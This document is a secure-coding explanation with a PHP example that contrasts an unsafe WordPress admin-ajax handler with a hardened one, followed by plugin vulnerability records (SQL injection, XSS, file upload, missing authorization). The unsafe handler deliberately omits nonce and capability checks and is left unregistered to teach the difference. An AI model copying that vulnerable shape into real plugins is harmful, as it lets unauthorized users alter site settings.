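Five records above are authorization failures on the same shape of endpoint: Tutor LMS Elementor Addons let Subscribers install plugins, WP Hotel Booking let anonymous visitors add rooms, BWL Advanced FAQ Manager and WC Price History exposed AJAX actions to any logged-in user, and WP Insurance activated plugins without a CSRF check. The block below is an added example, not any of those plugins' code; every `myplugin_` name is hypothetical and it assumes it is loaded as a WordPress plugin. It shows an `admin-ajax.php` handler in the vulnerable shape and then with the three checks a reviewer looks for: a nonce (intent, which is the CSRF defence), a capability (authorization), and a fixed set of accepted inputs (so the BWL-style "set any option to 1" cannot happen even for an authorized caller).

```php
<?php
// Added example (hypothetical admin-ajax action; not any plugin's code). Assumes
// it is loaded as a WordPress plugin; every myplugin_ name is made up.

// Vulnerable shape, shown for contrast and not registered here: reachable by
// any logged-in user through wp_ajax_, by anonymous visitors if also hooked to
// wp_ajax_nopriv_, and it writes an option without asking who is calling or
// whether the request was intended (no nonce, so CSRF applies as well).
function myplugin_set_notice_status_unsafe() {
    update_option('myplugin_notice_' . $_POST['key'], '1');
    wp_send_json_success();
}
// add_action('wp_ajax_myplugin_set_notice',        'myplugin_set_notice_status_unsafe');
// add_action('wp_ajax_nopriv_myplugin_set_notice', 'myplugin_set_notice_status_unsafe');

// Hardened shape.
function myplugin_set_notice_status_safe() {
    // 1. Intent (CSRF): the request must carry a nonce minted for this action.
    //    The third argument makes a failed check return false instead of die()ing
    //    so the caller gets a JSON error with a status code.
    if (!check_ajax_referer('myplugin_set_notice', 'nonce', false)) {
        wp_send_json_error(['message' => 'invalid nonce'], 403);
    }
    // 2. Authorization: a capability check, not "is logged in" or a role name.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'insufficient privileges'], 403);
    }
    // 3. Input: only a fixed set of keys may be written, so the caller cannot
    //    reach users_can_register or any other option by choosing the suffix.
    $allowed = ['dismissed_welcome', 'dismissed_review'];
    $key = isset($_POST['key']) ? sanitize_key(wp_unslash($_POST['key'])) : '';
    if (!in_array($key, $allowed, true)) {
        wp_send_json_error(['message' => 'unknown notice'], 400);
    }
    update_option('myplugin_notice_' . $key, '1', false);
    wp_send_json_success(['key' => $key]);
}
add_action('wp_ajax_myplugin_set_notice', 'myplugin_set_notice_status_safe');
// No wp_ajax_nopriv_ hook: anonymous visitors have no reason to reach this action.

// The page script receives the admin-ajax URL and a matching nonce.
function myplugin_admin_assets() {
    wp_register_script('myplugin-admin', plugins_url('admin.js', __FILE__), [], '1.0', true);
    wp_localize_script('myplugin-admin', 'myplugin', [
        'ajaxUrl' => admin_url('admin-ajax.php'),
        'nonce'   => wp_create_nonce('myplugin_set_notice'),
    ]);
    wp_enqueue_script('myplugin-admin');
}
add_action('admin_enqueue_scripts', 'myplugin_admin_assets');
```

The order matters less than the presence of all three. A nonce alone does not authorize (any Subscriber can obtain one from a page that prints it), and a capability check alone does not prove intent (an admin can be made to submit the request from another tab, which is the WP Insurance case). The capability to check is the one that matches the action: `install_plugins` or `activate_plugins` for the Tutor LMS and WP Insurance cases, not a generic `edit_posts`.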
{"CVE_ID":"CVE-2023-2111","slug":"holler-box","versionEndExcluding":"2.1.4","description":"The Fast & Effective Popups & Lead-Generation for WordPress plugin before 2.1.4 concatenates user input into an SQL query without escaping it first in the plugin's report API endpoint, which could allow administrators in multi-site configuration to leak sensitive information from the site's database.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a0bdd47-c339-489d-9443-f173a83447f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a0bdd47-c339-489d-9443-f173a83447f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13799","slug":"user-private-files","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The User Private Files \u2013 File Upload & Download Manager with Secure File Sharing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018new-fldr-name\u2019 parameter in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-private-files\\\/trunk\\\/js\\\/folder.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-private-files\\\/trunk\\\/js\\\/folder.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240877\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240877\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/419cf912-3187-43d7-90ab-1a20a46d86e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/419cf912-3187-43d7-90ab-1a20a46d86e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47368","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.33","versionEndExcluding":"2.1.34","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.33.","recommendation":"Update to version 2.1.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-plugin-2-1-33-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-plugin-2-1-33-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3430","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'printer_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718f5cf2-ca83-4981-9123-4360d043a32d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718f5cf2-ca83-4981-9123-4360d043a32d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3429","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'material_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cf26716-70b6-4e5e-9ac1-764060be2215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cf26716-70b6-4e5e-9ac1-764060be2215?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3428","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'coating_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaac2a61-7be6-4936-82a0-21c3665fa436?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eaac2a61-7be6-4936-82a0-21c3665fa436?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3427","slug":"3dprint-lite","versionImpact":"2.1.3.6","versionEndExcluding":"2.1.3.7","description":"The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'infill_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3249784%403dprint-lite&new=3249784%403dprint-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/156945e1-80dc-4fb4-958f-bb87722e96fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/156945e1-80dc-4fb4-958f-bb87722e96fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10879","slug":"forumwp","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The ForumWP \u2013 Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.0\\\/includes\\\/admin\\\/class-emails-list-table.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b3256b-5271-44b8-ab4d-05156d4f674b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b3256b-5271-44b8-ab4d-05156d4f674b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4539","slug":"web-application-firewall","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Web Application Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1.2. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e99531c-8742-4f91-8525-65bb3cb06644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e99531c-8742-4f91-8525-65bb3cb06644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055548\\\/web-application-firewall\\\/trunk\\\/helper\\\/utility.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055548\\\/web-application-firewall\\\/trunk\\\/helper\\\/utility.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0749","slug":"ocean-extra","versionEndExcluding":"2.1.3","description":"The Ocean Extra WordPress plugin before 2.1.3 does not ensure that the template to be loaded via a shortcode is actually a template, allowing any authenticated users such as subscriber to retrieve the content of arbitrary posts, such as draft, private or even password protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9caa8d2e-383b-47d7-8d21-d2ed6b1664cb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9caa8d2e-383b-47d7-8d21-d2ed6b1664cb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8538","slug":"tuxedo-big-file-uploads","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Big File Uploads \u2013 Increase Maximum File Upload Size plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.1.2. This is due to the plugin not sanitizing a file path in an error message. This makes it possible for authenticated attackers, with author-level access and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd308a4-7157-4bc6-a55b-c6a4a62510a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1bd308a4-7157-4bc6-a55b-c6a4a62510a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uglyrobot\\\/big-file-uploads\\\/blob\\\/master\\\/tuxedo_big_file_uploads.php#L601\",\"name\":\"https:\\\/\\\/github.com\\\/uglyrobot\\\/big-file-uploads\\\/blob\\\/master\\\/tuxedo_big_file_uploads.php#L601\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147755\\\/tuxedo-big-file-uploads\\\/trunk\\\/tuxedo_big_file_uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147755\\\/tuxedo-big-file-uploads\\\/trunk\\\/tuxedo_big_file_uploads.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4313","slug":"table-addons-for-elementor","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Table Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_id\u2019 parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddbb4bcf-daf7-4ae3-8f42-fce5f1d2c279?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddbb4bcf-daf7-4ae3-8f42-fce5f1d2c279?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/table-addons-for-elementor\\\/trunk\\\/includes\\\/class-table-addons-for-elementor-widget.php#L637\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/table-addons-for-elementor\\\/trunk\\\/includes\\\/class-table-addons-for-elementor-widget.php#L637\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104753%40table-addons-for-elementor&new=3104753%40table-addons-for-elementor&sfp_email=&sfph_mail=#file57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104753%40table-addons-for-elementor&new=3104753%40table-addons-for-elementor&sfp_email=&sfph_mail=#file57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12163","slug":"goodlayers-core","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The goodlayers-core WordPress plugin before 2.1.3 allows users with a subscriber role and above to upload SVGs containing malicious payloads.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea704054-fb66-4014-89bd-1c61074f64e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7855","slug":"wp-hotel-booking","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The WP Hotel Booking plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_review() function in all versions up to, and including, 2.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784593ec-b635-4f59-9afb-ab506f786d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784593ec-b635-4f59-9afb-ab506f786d21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/includes\\\/class-wphb-comments.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/includes\\\/class-wphb-comments.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3157905%40wp-hotel-booking&new=3157905%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3157905%40wp-hotel-booking&new=3157905%40wp-hotel-booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9182","slug":"contact-forms-anti-spam","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Maspik WordPress plugin before 2.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40007323-d684-430d-a882-8b4dfb76172b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40007323-d684-430d-a882-8b4dfb76172b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13234","slug":"woo-product-tables","versionImpact":"2.1.2","versionEndExcluding":"2.1.3","description":"The Product Table by WBW plugin for WordPress is vulnerable to SQL Injection via the 'additionalCondition' parameter in all versions up to, and including, 2.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221872%40woo-product-tables&new=3221872%40woo-product-tables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221872%40woo-product-tables&new=3221872%40woo-product-tables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67db430e-d796-4ace-b5d1-de492edb8ea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67db430e-d796-4ace-b5d1-de492edb8ea8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37519","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.27","versionEndExcluding":"2.1.28","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS. This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.27.","recommendation":"Update to version 2.1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-gutenberg-blocks-for-wordpress-plugin-2-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/premium-blocks-for-gutenberg\\\/wordpress-premium-blocks-gutenberg-blocks-for-wordpress-plugin-2-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8712","slug":"gtm-server-side","versionImpact":"2.1.19","versionEndExcluding":"2.1.20","description":"The GTM Server Side plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28f77d5a-fc17-4e17-85b9-4e6f66dbf2c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28f77d5a-fc17-4e17-85b9-4e6f66dbf2c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gtm-server-side\\\/tags\\\/2.1.19\\\/templates\\\/class-gtm-server-side-admin.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gtm-server-side\\\/tags\\\/2.1.19\\\/templates\\\/class-gtm-server-side-admin.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158847\\\/gtm-server-side\\\/tags\\\/2.1.20\\\/templates\\\/class-gtm-server-side-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158847\\\/gtm-server-side\\\/tags\\\/2.1.20\\\/templates\\\/class-gtm-server-side-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36712","slug":"kali-forms","versionEndExcluding":"2.1.2","description":"The Kali Forms plugin for WordPress is vulnerable to Unauthenticated Arbitrary Post Deletion in versions up to, and including, 2.1.1. This is due to the kaliforms_form_delete_uploaded_file function lacking any privilege or user protections. This makes it possible for unauthenticated attackers to delete any site post or page with the id parameter.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92644676-add4-415c-9a1a-c6616108688d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92644676-add4-415c-9a1a-c6616108688d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3219","slug":"eventon-lite","versionEndExcluding":"2.1.2","description":"The EventON WordPress plugin before 2.1.2 does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72d80887-0270-4987-9739-95b1a178c1fd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72d80887-0270-4987-9739-95b1a178c1fd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2796","slug":"eventon-lite","versionEndExcluding":"2.1.2","description":"The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef793c-e5a3-4c55-beee-56b0909f7a0d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef793c-e5a3-4c55-beee-56b0909f7a0d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4649","slug":"wp-extended-search","versionEndExcluding":"2.1.2","description":"The WP Extended Search WordPress plugin before 2.1.2 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d9ba176-97be-4b6b-9cf1-6c3047321a1e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d9ba176-97be-4b6b-9cf1-6c3047321a1e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11750","slug":"onlyoffice-docspace","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The ONLYOFFICE DocSpace plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice-docspace' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200973%40onlyoffice-docspace&new=3200973%40onlyoffice-docspace&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3200973%40onlyoffice-docspace&new=3200973%40onlyoffice-docspace&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f24bdd-0b78-4ec3-821b-6331e5bf65e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f24bdd-0b78-4ec3-821b-6331e5bf65e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
